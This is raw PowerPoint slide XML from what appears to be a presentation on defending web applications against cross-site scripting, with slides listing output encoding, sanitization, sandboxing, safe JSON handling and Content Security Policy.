                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>at the UI layer itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not depend on server-side protections (validation) to protect you from XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Be wary of developers disabling framework features that provide automatic XSS defense </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ie: React dangerouslySetInnerHTML             Angular bypassSecurityTrustAs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1696718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307630"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS Defense Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>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2108929999"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="348916" y="1294542"/>
          <a:ext cx="8446168" cy="4550636"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1199147">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1923271">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5323750">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3582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Data Type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Context</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Defense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HTML Body/Attribute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HTML Entity Encode/HTML Attribute Encode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JavaScript Variable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JavaScript Hex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GET Parameter</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URL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Untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> URL</a:t>
                      </a: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URL Validation,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> avoid JavaScript: URLs, Attribute Encoding, Safe URL Verification</a:t>
                      </a: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CSS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baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>CSS Hex Encoding</a:t>
                      </a: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Anywhere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Sanitization (Server and Client Side)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DOM</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Safe use of JS API's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Untrusted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> JavaScript</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Sandboxing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> and Deliver from Different Domain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Client Parse Time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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>JSON.parse</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>()</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> or json2.js</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Embedded</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r>
                        <a:rPr lang="en-US" sz="1400" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> Serialization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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3224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Mistakes were made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Content Security Policy 3.0</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41382910"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7870004" y="108616"/>
            <a:ext cx="1166117" cy="1185927"/>
            <a:chOff x="6835420" y="635329"/>
            <a:chExt cx="1465134" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Oval 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="bg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a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg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8" name="Freeform 1"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7320232" y="881197"/>
              <a:ext cx="495511" cy="973392"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7748 w 10781"/>
                <a:gd name="T1" fmla="*/ 9164 h 21180"/>
                <a:gd name="T2" fmla="*/ 6087 w 10781"/>
                <a:gd name="T3" fmla="*/ 10781 h 21180"/>
                <a:gd name="T4" fmla="*/ 5795 w 10781"/>
                <a:gd name="T5" fmla="*/ 12668 h 21180"/>
                <a:gd name="T6" fmla="*/ 2538 w 10781"/>
                <a:gd name="T7" fmla="*/ 13273 h 21180"/>
                <a:gd name="T8" fmla="*/ 1617 w 10781"/>
                <a:gd name="T9" fmla="*/ 15722 h 21180"/>
                <a:gd name="T10" fmla="*/ 2785 w 10781"/>
                <a:gd name="T11" fmla="*/ 17429 h 21180"/>
                <a:gd name="T12" fmla="*/ 3010 w 10781"/>
                <a:gd name="T13" fmla="*/ 18799 h 21180"/>
                <a:gd name="T14" fmla="*/ 3100 w 10781"/>
                <a:gd name="T15" fmla="*/ 19360 h 21180"/>
                <a:gd name="T16" fmla="*/ 4851 w 10781"/>
                <a:gd name="T17" fmla="*/ 21179 h 21180"/>
                <a:gd name="T18" fmla="*/ 7209 w 10781"/>
                <a:gd name="T19" fmla="*/ 19787 h 21180"/>
                <a:gd name="T20" fmla="*/ 7434 w 10781"/>
                <a:gd name="T21" fmla="*/ 18799 h 21180"/>
                <a:gd name="T22" fmla="*/ 7456 w 10781"/>
                <a:gd name="T23" fmla="*/ 17743 h 21180"/>
                <a:gd name="T24" fmla="*/ 7928 w 10781"/>
                <a:gd name="T25" fmla="*/ 17429 h 21180"/>
                <a:gd name="T26" fmla="*/ 8849 w 10781"/>
                <a:gd name="T27" fmla="*/ 14105 h 21180"/>
                <a:gd name="T28" fmla="*/ 7726 w 10781"/>
                <a:gd name="T29" fmla="*/ 13273 h 21180"/>
                <a:gd name="T30" fmla="*/ 7905 w 10781"/>
                <a:gd name="T31" fmla="*/ 12129 h 21180"/>
                <a:gd name="T32" fmla="*/ 8107 w 10781"/>
                <a:gd name="T33" fmla="*/ 11477 h 21180"/>
                <a:gd name="T34" fmla="*/ 9163 w 10781"/>
                <a:gd name="T35" fmla="*/ 9635 h 21180"/>
                <a:gd name="T36" fmla="*/ 10421 w 10781"/>
                <a:gd name="T37" fmla="*/ 6266 h 21180"/>
                <a:gd name="T38" fmla="*/ 8669 w 10781"/>
                <a:gd name="T39" fmla="*/ 5884 h 21180"/>
                <a:gd name="T40" fmla="*/ 607 w 10781"/>
                <a:gd name="T41" fmla="*/ 10488 h 21180"/>
                <a:gd name="T42" fmla="*/ 1752 w 10781"/>
                <a:gd name="T43" fmla="*/ 11050 h 21180"/>
                <a:gd name="T44" fmla="*/ 2628 w 10781"/>
                <a:gd name="T45" fmla="*/ 11252 h 21180"/>
                <a:gd name="T46" fmla="*/ 3167 w 10781"/>
                <a:gd name="T47" fmla="*/ 12712 h 21180"/>
                <a:gd name="T48" fmla="*/ 4963 w 10781"/>
                <a:gd name="T49" fmla="*/ 10938 h 21180"/>
                <a:gd name="T50" fmla="*/ 9994 w 10781"/>
                <a:gd name="T51" fmla="*/ 7839 h 21180"/>
                <a:gd name="T52" fmla="*/ 2134 w 10781"/>
                <a:gd name="T53" fmla="*/ 7681 h 21180"/>
                <a:gd name="T54" fmla="*/ 9770 w 10781"/>
                <a:gd name="T55" fmla="*/ 4649 h 21180"/>
                <a:gd name="T56" fmla="*/ 8444 w 10781"/>
                <a:gd name="T57" fmla="*/ 2672 h 21180"/>
                <a:gd name="T58" fmla="*/ 360 w 10781"/>
                <a:gd name="T59" fmla="*/ 7300 h 21180"/>
                <a:gd name="T60" fmla="*/ 2134 w 10781"/>
                <a:gd name="T61" fmla="*/ 4357 h 21180"/>
                <a:gd name="T62" fmla="*/ 7546 w 10781"/>
                <a:gd name="T63" fmla="*/ 2291 h 21180"/>
                <a:gd name="T64" fmla="*/ 6221 w 10781"/>
                <a:gd name="T65" fmla="*/ 337 h 21180"/>
                <a:gd name="T66" fmla="*/ 360 w 10781"/>
                <a:gd name="T67" fmla="*/ 3976 h 2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81" h="21180">
                  <a:moveTo>
                    <a:pt x="7748" y="9164"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7748" y="9164"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7277" y="9410"/>
                    <a:pt x="6895" y="9680"/>
                    <a:pt x="6603" y="10017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6378" y="10264"/>
                    <a:pt x="6199" y="10534"/>
                    <a:pt x="6087" y="10781"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5907" y="11185"/>
                    <a:pt x="5839" y="11590"/>
                    <a:pt x="5817" y="11904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5795" y="12218"/>
                    <a:pt x="5795" y="12488"/>
                    <a:pt x="5795" y="12668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5772" y="12892"/>
                    <a:pt x="5839" y="13094"/>
                    <a:pt x="5951" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2538" y="13273"/>
                    <a:pt x="2538" y="13273"/>
                    <a:pt x="2538" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2022" y="13273"/>
                    <a:pt x="1617" y="13656"/>
                    <a:pt x="1617" y="14105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="15722"/>
                    <a:pt x="1617" y="15722"/>
                    <a:pt x="1617" y="15722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1617" y="16733"/>
                    <a:pt x="2022" y="17429"/>
                    <a:pt x="2538" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2538" y="17429"/>
                    <a:pt x="2651" y="17429"/>
                    <a:pt x="2785" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2897" y="17429"/>
                    <a:pt x="3010" y="17563"/>
                    <a:pt x="3010" y="17743"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3010" y="18799"/>
                    <a:pt x="3010" y="18799"/>
                    <a:pt x="3010" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3032" y="18799"/>
                    <a:pt x="3032" y="18799"/>
                    <a:pt x="3032" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3010" y="18979"/>
                    <a:pt x="3055" y="19158"/>
                    <a:pt x="3100" y="19360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3234" y="19787"/>
                    <a:pt x="3234" y="19787"/>
                    <a:pt x="3234" y="19787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3481" y="20550"/>
                    <a:pt x="4222" y="21179"/>
                    <a:pt x="4851" y="21179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5615" y="21179"/>
                    <a:pt x="5615" y="21179"/>
                    <a:pt x="5615" y="21179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6244" y="21179"/>
                    <a:pt x="6985" y="20550"/>
                    <a:pt x="7209" y="19787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7344" y="19360"/>
                    <a:pt x="7344" y="19360"/>
                    <a:pt x="7344" y="19360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7412" y="19158"/>
                    <a:pt x="7434" y="18979"/>
                    <a:pt x="7434" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="18799"/>
                    <a:pt x="7456" y="18799"/>
                    <a:pt x="7456" y="18799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="17743"/>
                    <a:pt x="7456" y="17743"/>
                    <a:pt x="7456" y="17743"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7456" y="17563"/>
                    <a:pt x="7546" y="17429"/>
                    <a:pt x="7680" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7928" y="17429"/>
                    <a:pt x="7928" y="17429"/>
                    <a:pt x="7928" y="17429"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8444" y="17429"/>
                    <a:pt x="8849" y="16575"/>
                    <a:pt x="8849" y="15722"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8849" y="14105"/>
                    <a:pt x="8849" y="14105"/>
                    <a:pt x="8849" y="14105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8849" y="13656"/>
                    <a:pt x="8444" y="13273"/>
                    <a:pt x="7928" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7726" y="13273"/>
                    <a:pt x="7726" y="13273"/>
                    <a:pt x="7726" y="13273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7816" y="13139"/>
                    <a:pt x="7883" y="12959"/>
                    <a:pt x="7883" y="12780"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7905" y="12510"/>
                    <a:pt x="7905" y="12308"/>
                    <a:pt x="7905" y="12129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7928" y="11993"/>
                    <a:pt x="7928" y="11904"/>
                    <a:pt x="7951" y="11814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7995" y="11679"/>
                    <a:pt x="8017" y="11590"/>
                    <a:pt x="8107" y="11477"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8220" y="11365"/>
                    <a:pt x="8377" y="11207"/>
                    <a:pt x="8714" y="11050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9231" y="10781"/>
                    <a:pt x="9432" y="10151"/>
                    <a:pt x="9163" y="9635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8894" y="9119"/>
                    <a:pt x="8265" y="8894"/>
                    <a:pt x="7748" y="9164"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10421" y="6266"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10421" y="6266"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10061" y="5727"/>
                    <a:pt x="9253" y="5547"/>
                    <a:pt x="8669" y="5884"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1034" y="8917"/>
                    <a:pt x="1034" y="8917"/>
                    <a:pt x="1034" y="8917"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="9231"/>
                    <a:pt x="225" y="9949"/>
                    <a:pt x="607" y="10488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="854" y="10871"/>
                    <a:pt x="1303" y="11050"/>
                    <a:pt x="1752" y="11050"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1752" y="11050"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1932" y="11050"/>
                    <a:pt x="2134" y="11073"/>
                    <a:pt x="2291" y="11117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2426" y="11163"/>
                    <a:pt x="2538" y="11207"/>
                    <a:pt x="2628" y="11252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2763" y="11365"/>
                    <a:pt x="2875" y="11454"/>
                    <a:pt x="2987" y="11679"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3077" y="11881"/>
                    <a:pt x="3167" y="12195"/>
                    <a:pt x="3167" y="12712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5278" y="12712"/>
                    <a:pt x="5278" y="12712"/>
                    <a:pt x="5278" y="12712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5278" y="12039"/>
                    <a:pt x="5166" y="11454"/>
                    <a:pt x="4963" y="10938"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4829" y="10601"/>
                    <a:pt x="4627" y="10309"/>
                    <a:pt x="4424" y="10062"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9994" y="7839"/>
                    <a:pt x="9994" y="7839"/>
                    <a:pt x="9994" y="7839"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10600" y="7502"/>
                    <a:pt x="10780" y="6805"/>
                    <a:pt x="10421" y="6266"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134" y="7681"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2134" y="7681"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9770" y="4649"/>
                    <a:pt x="9770" y="4649"/>
                    <a:pt x="9770" y="4649"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10376" y="4313"/>
                    <a:pt x="10556" y="3616"/>
                    <a:pt x="10196" y="3077"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9837" y="2516"/>
                    <a:pt x="9029" y="2358"/>
                    <a:pt x="8444" y="2672"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="5727"/>
                    <a:pt x="809" y="5727"/>
                    <a:pt x="809" y="5727"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="6042"/>
                    <a:pt x="0" y="6761"/>
                    <a:pt x="360" y="7300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="741" y="7839"/>
                    <a:pt x="1527" y="8018"/>
                    <a:pt x="2134" y="7681"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134" y="4357"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2134" y="4357"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7546" y="2291"/>
                    <a:pt x="7546" y="2291"/>
                    <a:pt x="7546" y="2291"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8153" y="1977"/>
                    <a:pt x="8355" y="1258"/>
                    <a:pt x="7995" y="719"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7614" y="180"/>
                    <a:pt x="6827" y="0"/>
                    <a:pt x="6221" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="809" y="2403"/>
                    <a:pt x="809" y="2403"/>
                    <a:pt x="809" y="2403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="2740"/>
                    <a:pt x="0" y="3436"/>
                    <a:pt x="360" y="3976"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="741" y="4515"/>
                    <a:pt x="1527" y="4694"/>
                    <a:pt x="2134" y="4357"/>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2909446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XSS Defense:  Where are we going?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1526944"/>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What is Cross Site Scripting? (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2094147"/>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Output Escaping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2661350"/>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HTML Sanitization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3228553"/>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Safe JavaScript Sinks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3795756"/>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Sandboxing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4362957"/>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Safe JSON UI Usage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50C02447-3B9C-1C46-857D-F2A23FAF761E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4930158"/>
            <a:ext cx="8686800" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="45720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Content Security Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2904061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mph" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
